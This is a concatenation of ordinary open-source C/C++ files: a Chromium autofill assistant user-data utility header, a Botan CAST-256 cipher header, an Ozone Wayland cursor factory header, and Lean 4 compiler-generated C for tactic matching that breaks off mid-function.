// Copyright 2019 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef COMPONENTS_AUTOFILL_ASSISTANT_BROWSER_USER_DATA_UTIL_H_ #define COMPONENTS_AUTOFILL_ASSISTANT_BROWSER_USER_DATA_UTIL_H_ #include <vector> #include "base/callback.h" #include "components/autofill/core/browser/data_model/autofill_profile.h" #include "components/autofill/core/browser/data_model/credit_card.h" #include "components/autofill_assistant/browser/action_value.pb.h" #include "components/autofill_assistant/browser/actions/action_delegate.h" #include "components/autofill_assistant/browser/client_status.h" #include "components/autofill_assistant/browser/service.pb.h" #include "components/autofill_assistant/browser/user_data.h" #include "components/autofill_assistant/browser/web/element_finder.h" #include "components/autofill_assistant/browser/website_login_manager.h" namespace autofill_assistant { namespace user_data { // Validate the completeness of a contact. std::vector<std::string> GetContactValidationErrors( const autofill::AutofillProfile* profile, const CollectUserDataOptions& collect_user_data_options); // Sorts the given contacts based on completeness, and returns a vector of // indices in sorted order. Full contacts will be ordered before empty ones, // and for equally complete contacts, this falls back to sorting based on last // used. std::vector<int> SortContactsByCompleteness( const CollectUserDataOptions& collect_user_data_options, const std::vector<std::unique_ptr<Contact>>& contacts); // Get the default selection for the current list of contacts. Returns -1 if no // default selection is possible. int GetDefaultContact(const CollectUserDataOptions& collect_user_data_options, const std::vector<std::unique_ptr<Contact>>& contacts); // Validate the completeness of a shipping address. std::vector<std::string> GetShippingAddressValidationErrors( const autofill::AutofillProfile* profile, const CollectUserDataOptions& collect_user_data_options); // Sorts the given addresses based on completeness, and returns a vector of // indices in sorted order. Full addresses will be ordered before empty ones, // and for equally complete profiles, this falls back to sorting based on // last used. std::vector<int> SortShippingAddressesByCompleteness( const CollectUserDataOptions& collect_user_data_options, const std::vector<std::unique_ptr<Address>>& addresses); // Get the default selection for the current list of addresses. Returns -1 if no // no default selection is possible. int GetDefaultShippingAddress( const CollectUserDataOptions& collect_user_data_options, const std::vector<std::unique_ptr<Address>>& addresses); std::vector<std::string> GetPaymentInstrumentValidationErrors( const autofill::CreditCard* credit_card, const autofill::AutofillProfile* billing_address, const CollectUserDataOptions& collect_user_data_options); // Sorts the given payment instruments by completeness, and returns a vector // of payment instrument indices in sorted order. Full payment instruments will // be ordered before empty ones, and for equally complete payment instruments, // this falls back to sorting based on the full name on the credit card. std::vector<int> SortPaymentInstrumentsByCompleteness( const CollectUserDataOptions& collect_user_data_options, const std::vector<std::unique_ptr<PaymentInstrument>>& payment_instruments); // Get the default selection for the current list of payment instruments. // Returns -1 if no default selection is possible. int GetDefaultPaymentInstrument( const CollectUserDataOptions& collect_user_data_options, const std::vector<std::unique_ptr<PaymentInstrument>>& payment_instruments); std::unique_ptr<autofill::AutofillProfile> MakeUniqueFromProfile( const autofill::AutofillProfile& profile); // Compare contact fields only. This comparison checks a subset of // AutofillProfile::Compare. Falls back to comparing the GUIDs if nothing else // is to be compared. bool CompareContactDetails( const CollectUserDataOptions& collect_user_data_options, const autofill::AutofillProfile* a, const autofill::AutofillProfile* b); // Get a formatted client value. The replacement is treated as strict, // meaning a missing value will lead to a failed ClientStatus. // This method returns: // - INVALID_ACTION, if the value is empty. // - INVALID_ACTION, if a profile is provided and it is empty. // - PRECONDITION_FAILED, if the requested profile is not found. // - AUTOFILL_INFO_NOT_AVAILABLE, if a key from an AUtofill source cannot be // resolved. // - CLIENT_MEMORY_KEY_NOT_AVAILABLE, if a key from the client memory cannot be // resolved. // - EMPTY_VALUE_EXPRESSION_RESULT, if the result is an empty string. // - ACTION_APPLIED otherwise. ClientStatus GetFormattedClientValue(const AutofillValue& autofill_value, const UserData& user_data, std::string* out_value); ClientStatus GetFormattedClientValue( const AutofillValueRegexp& autofill_value_regexp, const UserData& user_data, std::string* out_value); // Get a password manager value from the |UserData|. Returns the user name // directly and resolves the password from the |WebsiteLoginManager|. If the // login credentials do not exist, fails with |PRECONDITION_FAILED|. If the // origin of the |target_element| does not match the origin of the login // credentials, fails with |PASSWORD_ORIGIN_MISMATCH|. void GetPasswordManagerValue( const PasswordManagerValue& password_manager_value, const ElementFinder::Result& target_element, const UserData* user_data, WebsiteLoginManager* website_login_manager, base::OnceCallback<void(const ClientStatus&, const std::string&)> callback); // Retrieve a single string value stored in |UserData| under // |client_memory_key|. If the value is not present or not a single string, // fails with |PRECONDITION_FAILED|. ClientStatus GetClientMemoryStringValue(const std::string& client_memory_key, const UserData* user_data, std::string* out_value); // Take a |text_value| and resolve its content to a string. Reports the result // through the |callback|. void ResolveTextValue( const TextValue& text_value, const ElementFinder::Result& target_element, const ActionDelegate* action_delegate, base::OnceCallback<void(const ClientStatus&, const std::string&)> callback); } // namespace user_data } // namespace autofill_assistant #endif // COMPONENTS_AUTOFILL_ASSISTANT_BROWSER_USER_DATA_UTIL_H_
/* * CAST-256 * (C) 1999-2007 Jack Lloyd * * Botan is released under the Simplified BSD License (see license.txt) */ #ifndef BOTAN_CAST256_H__ #define BOTAN_CAST256_H__ #include <botan/block_cipher.h> namespace Botan { /** * CAST-256 */ class BOTAN_DLL CAST_256 final : public Block_Cipher_Fixed_Params<16, 4, 32, 4> { public: void encrypt_n(const byte in[], byte out[], size_t blocks) const override; void decrypt_n(const byte in[], byte out[], size_t blocks) const override; void clear() override; std::string name() const override { return "CAST-256"; } BlockCipher* clone() const override { return new CAST_256; } private: void key_schedule(const byte[], size_t) override; secure_vector<u32bit> m_MK; secure_vector<byte> m_RK; }; } #endif
// Copyright 2014 Intel Corporation. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef OZONE_UI_CURSOR_CURSOR_FACTORY_OZONE_WAYLAND_H_ #define OZONE_UI_CURSOR_CURSOR_FACTORY_OZONE_WAYLAND_H_ #include "ui/base/cursor/ozone/cursor_factory_ozone.h" namespace ui { class CursorFactoryOzoneWayland : public CursorFactoryOzone { public: CursorFactoryOzoneWayland(); virtual ~CursorFactoryOzoneWayland(); virtual PlatformCursor GetDefaultCursor(int type) OVERRIDE; virtual PlatformCursor CreateImageCursor(const SkBitmap& bitmap, const gfx::Point& hotspot) OVERRIDE; virtual void RefImageCursor(PlatformCursor cursor) OVERRIDE; virtual void UnrefImageCursor(PlatformCursor cursor) OVERRIDE; virtual void SetCursor(gfx::AcceleratedWidget widget, PlatformCursor cursor) OVERRIDE; }; } // namespace ui #endif // OZONE_UI_CURSOR_CURSOR_FACTORY_OZONE_WAYLAND_H_
// Lean compiler output // Module: Lean.Elab.Tactic.Match // Imports: Init Lean.Parser.Term Lean.Elab.Match Lean.Elab.Tactic.Basic Lean.Elab.Tactic.Induction #include <lean/lean.h> #if defined(__clang__) #pragma clang diagnostic ignored "-Wunused-parameter" #pragma clang diagnostic ignored "-Wunused-label" #elif defined(__GNUC__) && !defined(__CLANG__) #pragma GCC diagnostic ignored "-Wunused-parameter" #pragma GCC diagnostic ignored "-Wunused-label" #pragma GCC diagnostic ignored "-Wunused-but-set-variable" #endif #ifdef __cplusplus extern "C" { #endif lean_object* l___regBuiltin_Lean_Elab_Tactic_evalMatch(lean_object*); size_t l_USize_add(size_t, size_t); extern lean_object* l_Lean_Parser_Tactic_eraseAuxDiscrs___elambda__1___closed__2; lean_object* l_Lean_MonadRef_mkInfoFromRefPos___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__1(lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Elab_Tactic_getMainTag(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_LocalDecl_userName(lean_object*); extern lean_object* l_Lean_nullKind; lean_object* l_Lean_Elab_Tactic_adaptExpander___lambda__1(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* lean_name_mk_string(lean_object*, lean_object*); uint8_t l_USize_decEq(size_t, size_t); lean_object* lean_array_uget(lean_object*, size_t); lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm_match__1___rarg(lean_object*, lean_object*); lean_object* l_Array_append___rarg(lean_object*, lean_object*); lean_object* l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3___boxed(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_Lean_Elab_throwUnsupportedSyntax___rarg___closed__1; lean_object* l_Lean_SourceInfo_fromRef(lean_object*); lean_object* l_ReaderT_bind___at_Lean_Elab_Tactic_liftMetaMAtMain___spec__1___rarg(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* lean_array_uset(lean_object*, size_t, lean_object*); lean_object* l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Elab_withMacroExpansionInfo___at_Lean_Elab_Tactic_adaptExpander___spec__1(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_myMacro____x40_Init_Notation___hyg_13954____closed__8; lean_object* l_Lean_Elab_Tactic_AuxMatchTermState_cases___default; size_t l_USize_sub(size_t, size_t); extern lean_object* l_Array_empty___closed__1; lean_object* lean_st_ref_get(lean_object*, lean_object*); lean_object* l_Lean_mkIdentFrom(lean_object*, lean_object*); lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm_match__1(lean_object*); lean_object* l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__5___boxed(lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlFromMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__3___boxed(lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_MonadRef_mkInfoFromRefPos___at_Lean_Elab_Tactic_evalIntro___spec__1___rarg(lean_object*, lean_object*, lean_object*); lean_object* lean_array_push(lean_object*, lean_object*); lean_object* lean_array_get_size(lean_object*); lean_object* l_Lean_Elab_Tactic_withMainContext___rarg(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_myMacro____x40_Init_Notation___hyg_13954____closed__2; lean_object* l_Lean_throwError___at_Lean_Elab_Tactic_evalMatch___spec__2(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_Lean_Elab_Term_initFn____x40_Lean_Elab_Match___hyg_7269____closed__1; lean_object* l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__4; size_t l_USize_shiftRight(size_t, size_t); lean_object* lean_string_utf8_byte_size(lean_object*); lean_object* l_Lean_MonadRef_mkInfoFromRefPos___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__1___boxed(lean_object*, lean_object*, lean_object*); lean_object* l_Lean_KeyedDeclsAttribute_addBuiltin___rarg(lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_throwErrorAt___at_Lean_Elab_Tactic_evalMatch___spec__1___boxed(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Elab_Term_getMainModule___rarg(lean_object*, lean_object*); extern lean_object* l_myMacro____x40_Init_Notation___hyg_1481____closed__8; uint8_t l_USize_decLt(size_t, size_t); extern lean_object* l_myMacro____x40_Init_Notation___hyg_13954____closed__13; lean_object* lean_nat_add(lean_object*, lean_object*); lean_object* l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__2; lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs(lean_object*); extern lean_object* l_Lean_Parser_Tactic_eraseAuxDiscrs___elambda__1___closed__5; lean_object* l_Lean_throwError___at_Lean_Elab_Tactic_evalMatch___spec__2___boxed(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___lambda__1___boxed(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); uint8_t lean_nat_dec_eq(lean_object*, lean_object*); lean_object* l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2(lean_object*, lean_object*, size_t, size_t, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_Lean_groupKind___closed__2; lean_object* lean_st_ref_take(lean_object*, lean_object*); extern lean_object* l_Lean_Parser_Tactic_myMacro____x40_Init_Notation___hyg_16699____closed__3; lean_object* lean_nat_sub(lean_object*, lean_object*); lean_object* l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___boxed(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__1; uint8_t l_Lean_Elab_Term_isAuxDiscrName(lean_object*); extern lean_object* l_Lean_Parser_Tactic_myMacro____x40_Init_Notation___hyg_16699____closed__5; lean_object* l_Lean_Meta_tryClear(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_stx___x3f___closed__3; lean_object* l_Lean_Elab_Tactic_evalMatch_match__1(lean_object*); lean_object* l_Lean_throwErrorAt___at_Lean_Elab_Tactic_evalMatch___spec__1(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Syntax_getHeadInfo(lean_object*); lean_object* l_Lean_replaceRef(lean_object*, lean_object*); lean_object* lean_array_get(lean_object*, lean_object*, lean_object*); lean_object* l___private_Lean_Elab_Util_0__Lean_Elab_expandMacro_x3f___boxed(lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__3; lean_object* l_List_forIn_loop___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__7___boxed(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Syntax_setKind(lean_object*, lean_object*); lean_object* l_Lean_Name_appendIndexAfter(lean_object*, lean_object*); lean_object* l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs___closed__1; extern lean_object* l___private_Lean_Elab_Tactic_Basic_0__Lean_Elab_Tactic_sortFVarIds___closed__1; extern lean_object* l_myMacro____x40_Init_Notation___hyg_13352____closed__13; lean_object* l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__4(lean_object*, lean_object*); lean_object* l_Lean_Elab_Term_getCurrMacroScope(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); size_t l_USize_shiftLeft(size_t, size_t); lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm___closed__1; lean_object* l_Lean_Elab_Tactic_getMainGoal(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___lambda__1(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l___regBuiltin_Lean_Elab_Tactic_evalMatch___closed__1; extern lean_object* l_Lean_Parser_Tactic_paren___closed__1; size_t lean_usize_of_nat(lean_object*); extern lean_object* l_Lean_Elab_Tactic_tacticElabAttribute; lean_object* l_Lean_Elab_Tactic_AuxMatchTermState_nextIdx___default; lean_object* l_Lean_addMacroScope(lean_object*, lean_object*, lean_object*); size_t l_USize_land(size_t, size_t); lean_object* l_Lean_LocalDecl_fvarId(lean_object*); extern lean_object* l_Lean_nullKind___closed__2; lean_object* l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6___boxed(lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_Lean_Parser_Tactic_myMacro____x40_Init_Notation___hyg_18957____closed__5; lean_object* l_List_forIn_loop___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__7(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_Lean_Parser_Tactic_refine___closed__1; lean_object* l_Lean_Elab_Tactic_evalMatch_match__1___rarg(lean_object*, lean_object*); extern lean_object* l_Lean_Parser_Tactic_refine___closed__2; lean_object* l_Lean_Syntax_setArg(lean_object*, lean_object*, lean_object*); lean_object* lean_environment_main_module(lean_object*); extern lean_object* l_myMacro____x40_Init_Notation___hyg_13954____closed__10; uint8_t lean_nat_dec_le(lean_object*, lean_object*); lean_object* l_Lean_LocalContext_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__1(lean_object*, lean_object*, lean_object*); extern lean_object* l_Lean_Parser_Tactic_case___closed__1; lean_object* l_Lean_Syntax_getArgs(lean_object*); lean_object* l_Lean_Name_append(lean_object*, lean_object*); extern lean_object* l_myMacro____x40_Init_Notation___hyg_15419____closed__12; lean_object* l_Lean_Elab_Tactic_evalMatch(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_Lean_Parser_Tactic_match___elambda__1___closed__1; lean_object* l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6(lean_object*, size_t, size_t, lean_object*); lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___boxed__const__1; extern lean_object* l_Lean_Parser_Tactic_case___closed__2; lean_object* l_Lean_LocalContext_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__1___boxed(lean_object*, lean_object*, lean_object*); lean_object* lean_st_ref_set(lean_object*, lean_object*, lean_object*); lean_object* l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlFromMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__3(lean_object*, size_t, size_t, lean_object*); lean_object* l_Lean_addMessageContextFull___at_Lean_Meta_instAddMessageContextMetaM___spec__1(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__1; lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___boxed(lean_object*); lean_object* l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__5(lean_object*, size_t, size_t, lean_object*); uint8_t l_Lean_Syntax_isOfKind(lean_object*, lean_object*); extern lean_object* l_prec_x28___x29___closed__7; lean_object* l_Lean_Elab_Tactic_replaceMainGoal(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); extern lean_object* l_prec_x28___x29___closed__3; lean_object* l_Lean_Syntax_getArg(lean_object*, lean_object*); extern lean_object* l_Lean_mkOptionalNode___closed__2; lean_object* l_Std_PersistentArray_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__2(lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg(lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_unsafeCast(lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3___rarg(lean_object*); lean_object* lean_usize_to_nat(size_t); lean_object* l_Std_PersistentArray_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__2___boxed(lean_object*, lean_object*, lean_object*); lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm(lean_object*, lean_object*, lean_object*, lean_object*); lean_object* l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__2; lean_object* l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs(lean_object*); lean_object* l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__4___boxed(lean_object*, lean_object*); uint8_t lean_nat_dec_lt(lean_object*, lean_object*); extern lean_object* l_Std_PersistentArray_getAux___rarg___closed__1; lean_object* l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__5(lean_object* x_1, size_t x_2, size_t x_3, lean_object* x_4) { _start: { uint8_t x_5; x_5 = x_2 == x_3; if (x_5 == 0) { lean_object* x_6; lean_object* x_7; size_t x_8; size_t x_9; x_6 = lean_array_uget(x_1, x_2); x_7 = l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__4(x_6, x_4); lean_dec(x_6); x_8 = 1; x_9 = x_2 + x_8; x_2 = x_9; x_4 = x_7; goto _start; } else { return x_4; } } } lean_object* l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6(lean_object* x_1, size_t x_2, size_t x_3, lean_object* x_4) { _start: { uint8_t x_5; x_5 = x_2 == x_3; if (x_5 == 0) { lean_object* x_6; size_t x_7; size_t x_8; x_6 = lean_array_uget(x_1, x_2); x_7 = 1; x_8 = x_2 + x_7; if (lean_obj_tag(x_6) == 0) { x_2 = x_8; goto _start; } else { lean_object* x_10; lean_object* x_11; uint8_t x_12; x_10 = lean_ctor_get(x_6, 0); lean_inc(x_10); lean_dec(x_6); x_11 = l_Lean_LocalDecl_userName(x_10); x_12 = l_Lean_Elab_Term_isAuxDiscrName(x_11); if (x_12 == 0) { lean_dec(x_10); x_2 = x_8; goto _start; } else { lean_object* x_14; lean_object* x_15; x_14 = l_Lean_LocalDecl_fvarId(x_10); lean_dec(x_10); x_15 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_15, 0, x_14); lean_ctor_set(x_15, 1, x_4); x_2 = x_8; x_4 = x_15; goto _start; } } } else { return x_4; } } } lean_object* l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__4(lean_object* x_1, lean_object* x_2) { _start: { if (lean_obj_tag(x_1) == 0) { lean_object* x_3; lean_object* x_4; lean_object* x_5; uint8_t x_6; x_3 = lean_ctor_get(x_1, 0); x_4 = lean_array_get_size(x_3); x_5 = lean_unsigned_to_nat(0u); x_6 = lean_nat_dec_lt(x_5, x_4); if (x_6 == 0) { lean_dec(x_4); return x_2; } else { uint8_t x_7; x_7 = lean_nat_dec_le(x_4, x_4); if (x_7 == 0) { lean_dec(x_4); return x_2; } else { size_t x_8; size_t x_9; lean_object* x_10; x_8 = 0; x_9 = lean_usize_of_nat(x_4); lean_dec(x_4); x_10 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__5(x_3, x_8, x_9, x_2); return x_10; } } } else { lean_object* x_11; lean_object* x_12; lean_object* x_13; uint8_t x_14; x_11 = lean_ctor_get(x_1, 0); x_12 = lean_array_get_size(x_11); x_13 = lean_unsigned_to_nat(0u); x_14 = lean_nat_dec_lt(x_13, x_12); if (x_14 == 0) { lean_dec(x_12); return x_2; } else { uint8_t x_15; x_15 = lean_nat_dec_le(x_12, x_12); if (x_15 == 0) { lean_dec(x_12); return x_2; } else { size_t x_16; size_t x_17; lean_object* x_18; x_16 = 0; x_17 = lean_usize_of_nat(x_12); lean_dec(x_12); x_18 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6(x_11, x_16, x_17, x_2); return x_18; } } } } } lean_object* l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlFromMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__3(lean_object* x_1, size_t x_2, size_t x_3, lean_object* x_4) { _start: { if (lean_obj_tag(x_1) == 0) { lean_object* x_5; size_t x_6; lean_object* x_7; lean_object* x_8; lean_object* x_9; size_t x_10; size_t x_11; size_t x_12; size_t x_13; size_t x_14; size_t x_15; lean_object* x_16; lean_object* x_17; lean_object* x_18; lean_object* x_19; uint8_t x_20; x_5 = lean_ctor_get(x_1, 0); x_6 = x_2 >> x_3 % (sizeof(size_t) * 8); x_7 = lean_usize_to_nat(x_6); x_8 = l_Std_PersistentArray_getAux___rarg___closed__1; x_9 = lean_array_get(x_8, x_5, x_7); x_10 = 1; x_11 = x_10 << x_3 % (sizeof(size_t) * 8); x_12 = x_11 - x_10; x_13 = x_2 & x_12; x_14 = 5; x_15 = x_3 - x_14; x_16 = l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlFromMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__3(x_9, x_13, x_15, x_4); lean_dec(x_9); x_17 = lean_unsigned_to_nat(1u); x_18 = lean_nat_add(x_7, x_17); lean_dec(x_7); x_19 = lean_array_get_size(x_5); x_20 = lean_nat_dec_lt(x_18, x_19); if (x_20 == 0) { lean_dec(x_19); lean_dec(x_18); return x_16; } else { uint8_t x_21; x_21 = lean_nat_dec_le(x_19, x_19); if (x_21 == 0) { lean_dec(x_19); lean_dec(x_18); return x_16; } else { size_t x_22; size_t x_23; lean_object* x_24; x_22 = lean_usize_of_nat(x_18); lean_dec(x_18); x_23 = lean_usize_of_nat(x_19); lean_dec(x_19); x_24 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__5(x_5, x_22, x_23, x_16); return x_24; } } } else { lean_object* x_25; lean_object* x_26; lean_object* x_27; uint8_t x_28; x_25 = lean_ctor_get(x_1, 0); x_26 = lean_usize_to_nat(x_2); x_27 = lean_array_get_size(x_25); x_28 = lean_nat_dec_lt(x_26, x_27); if (x_28 == 0) { lean_dec(x_27); lean_dec(x_26); return x_4; } else { uint8_t x_29; x_29 = lean_nat_dec_le(x_27, x_27); if (x_29 == 0) { lean_dec(x_27); lean_dec(x_26); return x_4; } else { size_t x_30; size_t x_31; lean_object* x_32; x_30 = lean_usize_of_nat(x_26); lean_dec(x_26); x_31 = lean_usize_of_nat(x_27); lean_dec(x_27); x_32 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6(x_25, x_30, x_31, x_4); return x_32; } } } } } lean_object* l_Std_PersistentArray_foldlM___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__2(lean_object* x_1, lean_object* x_2, lean_object* x_3) { _start: { lean_object* x_4; uint8_t x_5; x_4 = lean_unsigned_to_nat(0u); x_5 = lean_nat_dec_eq(x_3, x_4); if (x_5 == 0) { lean_object* x_6; uint8_t x_7; x_6 = lean_ctor_get(x_1, 3); x_7 = lean_nat_dec_le(x_6, x_3); if (x_7 == 0) { lean_object* x_8; size_t x_9; size_t x_10; lean_object* x_11; lean_object* x_12; lean_object* x_13; uint8_t x_14; x_8 = lean_ctor_get(x_1, 0); x_9 = lean_usize_of_nat(x_3); x_10 = lean_ctor_get_usize(x_1, 4); x_11 = l___private_Std_Data_PersistentArray_0__Std_PersistentArray_foldlFromMAux___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__3(x_8, x_9, x_10, x_2); x_12 = lean_ctor_get(x_1, 1); x_13 = lean_array_get_size(x_12); x_14 = lean_nat_dec_lt(x_4, x_13); if (x_14 == 0) { lean_dec(x_13); return x_11; } else { uint8_t x_15; x_15 = lean_nat_dec_le(x_13, x_13); if (x_15 == 0) { lean_dec(x_13); return x_11; } else { size_t x_16; size_t x_17; lean_object* x_18; x_16 = 0; x_17 = lean_usize_of_nat(x_13); lean_dec(x_13); x_18 = l_Array_foldlMUnsafe_fold___at_Lean_Elab_Tactic_evalEraseAuxDiscrs___spec__6(x_12, x_16, x_17, x_11); return x_18; } } } else { lean_object* x_19; lean_object* x_20; lean_object* x_21; uint8_t x_22; x_19 = lean_ctor_get(x_1, 1); x_20 = lean_nat_sub(x_3, x_6); x_21 = lean_array_get_size(x_19); x_22 = lean_nat_dec_lt(x_20, x_21); if (x_22 == 0) { lean_dec(x_21); lean_dec(x_20); return x_2; } else { uint8_t x_23; x_23 = lean_nat_dec_le(x_21, x_21); if (x_23 == 0) { lean_dec(x_21); lean_dec(x_20); return x_2; } else { size_t x_24; size_t x_25; 